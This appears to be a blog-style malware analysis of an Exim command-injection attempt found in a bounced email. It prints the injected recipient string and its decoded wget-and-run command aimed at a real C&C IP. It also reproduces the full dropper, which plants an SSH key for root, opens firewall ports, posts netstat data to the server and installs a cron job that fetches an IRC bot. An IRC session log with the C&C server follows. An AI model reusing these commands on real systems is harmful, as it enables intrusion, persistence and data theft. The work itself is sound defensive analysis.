Malware analysis

Initial infection

It started this morning. I received a mail from my mailserver that it couldn't deliver an email. It looked like a normal email, but the recipient was what triggered me. The mailadres had some command injection. After some searching on the internet I ended up in probably some old vulnerability in exim that made this possible. But let's take a look at the mailadres.

<root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2045.148.10.84\x2fss\x20-Osxs\x3bchmod\x20\x2bx\x20sxs\x3b.\x2fsxs\x22}}@gnr01.servers.sciuro.org>

I replaced the "\x" for the "%" to parse it as URL decode. Changed some characters and I ended up with the following command. We got a C&C server! 45.148.10.84

/bin/sh -c "wget 45.148.10.84/ss -Osxs;chmod +x sxs;./sxs"

Initial malware

The ss executable contains the next code:

#!/bin/bash
exists=$(grep -c "^jkl:" /etc/passwd)
if [ $exists -eq 0 ]; then
chattr -isa /root/.ssh/authorized_keys
echo 'ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCtI3JzaABDotq1IL3m3KCpwMdGCY+Jr5CGbnznw4QPvVh139jplKrTxm7/3bLdfiLXtkmZfQBiWykH1zi0boA4Tdpw2VJAP9cJL7aru3yX6Zp9Ipo8BdwHHx/KCvLeT9zXosdFCGMyrLZySvhLs3ndqcKOLnQiEAwctaMQxH6hyuRo7Ao5xHTQuYHPVLjNQcZ4as2lFmSEHciPaRda7qgOapWXJdFscwiCyfjxoXOvhRLIb9zVuyvYIc+/X3lufaBrr5G7ElnEfV9/82D9GEOfIXXmLpbSmk5jnu66AXPk4KepTzFx3orvQA7Vk84YsWQDxcyiw78nCvICk1S30YtJ root@' >/root/.ssh/authorized_keys
/usr/sbin/sshd -p 322
/sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/sbin/iptables-save >/dev/null 2>&1
/usr/sbin/iptables -I OUTPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/usr/sbin/iptables -I INPUT -p tcp --dport 322 -j ACCEPT >/dev/null 2>&1
/usr/sbin/iptables-save >/dev/null 2>&1
data2=`netstat -natp |grep sshd|base64`
wget -q --post-data "DATA=dGlua2QK&DATA2=$data2" 45.148.10.84/.z/p.php -O /dev/null
cd /tmp
echo 'cd /tmp;wget 45.148.10.84/r.png;perl r.png;rm -fr r.png' > twink
echo 'crontab -l|grep -v twink > /tmp/mycron;crontab /tmp/mycron;rm -fr /tmp/twink' >> twink
echo '* * * * * /tmp/twink' >mycron
crontab -l >> mycron
chmod +x /tmp/twink
crontab mycron;rm -fr mycron
else
exit
fi

This script will do the following:

1. Checks it the user "jkl" exists. If so, stop executing the script.
2. Add a public SSH key to the root user.
3. Start a SSH server listening on port 322.
4. Open the firewall for incoming and outgoing connection on port 322 and save it for reboots.

5. Show the current listening ports for the SSH server and send them in a POST request back to the C&C server.

6. Download a r.png file, run it trough perl and save it as the file twink.

7. Put the downloaded script in the crontab and run it every minute.

Agent

The twink executable is a Perl IRC bot. You can find the code here. It's a really old script, but it still works.

• It chooses a process name from a list and rename his own processname to hide his presence.

• Do some preparations for connecting to the C&C server by IRC.

  • It takes a random IRC client version name. Most of them are from the mIRC IRC client.
  • It chooses a random username.
  • It chooses a random realname.
  • It chooses a random nickname.
• It tries to connect to the IRC server on 45.148.10.84 on port 21, 8080 or 9999

• It listens for commands of the user evil with a hostmask of mfu.txt in the channel #root.

IRC C&C server

There is an IRC server on the IP 45.148.10.84. Let's connect to it and see how it's working:

[09:08:24] Connecting to [45.148.10.84] on port 8080
[09:08:24] Connection to host established
[09:08:25] -irc.evilcode.php-   *** Looking up your hostname...
[09:08:25] -irc.evilcode.php-   *** Couldn't resolve your hostname; using your IP address instead
[09:08:25] Welcome to the Don`t Use This ircd IRC Network XXXXX!XXXXX@XXX.XXX.XXX.XXX
[09:08:25] Your host is irc.evilcode.php, running version Unreal3.2.10.6
[09:08:25] This server was created Sat Mar 7 2020 at 10:20:59 UTC
[09:08:25] irc.evilcode.php Unreal3.2.10.6 iowghraAsORTVSxNCWqBzvdHtGpI lvhopsmntikrRcaqOALQbSeIKVfMCuzNTGjZ
[09:08:25] AWAYLEN=307 CHANLIMIT=#:10 CHANNELLEN=32 CMDS=KNOCK,MAP,DCCALLOW,USERIP,STARTTLS HCN KICKLEN=307 MAXCHANNELS=10 MAXLIST=b:60,e:60,I:60 NAMESX NICKLEN=30 SAFELIST TOPICLEN=307 UHNAMES are supported by this server
[09:08:25] CASEMAPPING=ascii CHANMODES=beI,kfL,lj,psmntirRcOAQKVCuzNSMTGZ CHANTYPES=# ELIST=MNUCT EXTBAN=~,qjncrRa MAXTARGETS=20 MODES=12 NETWORK=Don`t-Use-This-ircd PREFIX=(qaohv)~&@%+ SILENCE=15 WALLCHOPS WATCH=128 WATCHOPTS=A are supported by this server
[09:08:25] EXCEPTS INVEX STATUSMSG=~&@%+ are supported by this server
[09:08:25] There are 1 users and 9 invisible on 1 servers
[09:08:25] 1 operator(s) online
[09:08:25] 4 channels formed
[09:08:25] I have 10 clients and 0 servers
[09:08:25] Current local users 10, max 232
[09:08:25] Current global users 10, max 232
[09:08:25] Message(422): MOTD File is missing
[09:08:25] XXXXX sets mode +iwx

After we are connected, we automatically joined the channel #R. There was nobody, except an OP user, named evil. He had the next whois information.

[09:12:18] evil has userhost fld@mfu.txt and real name “.”
[09:12:18] evil is in @#R 
[09:12:18] evil is connected on irc.evilcode.php (Stay OUT BITCH!)
[09:12:18] evil is a Network Administrator
[09:12:18] evil is available for help.
[09:12:18] evil signed on at 31 March 2020 at 19:47:43 CEST and has been idle for 13 hours, 11 minutes, 35 seconds

This confirms our findings about the C&C control user in the twink.pl script. This is the user that could give the commands to the bot. We could also join the channel #root, but that didn't changed anything. One OP user and one client user. I took some time to observe, but nothing was happening.

OSINT

IP Information

Abuse sites

Shodan

Pastebin

Thanks

• https://blog.grospolina.org/index.php?/archives/18-email-von-service.com-twink-mycron-CVE-2019-1014.html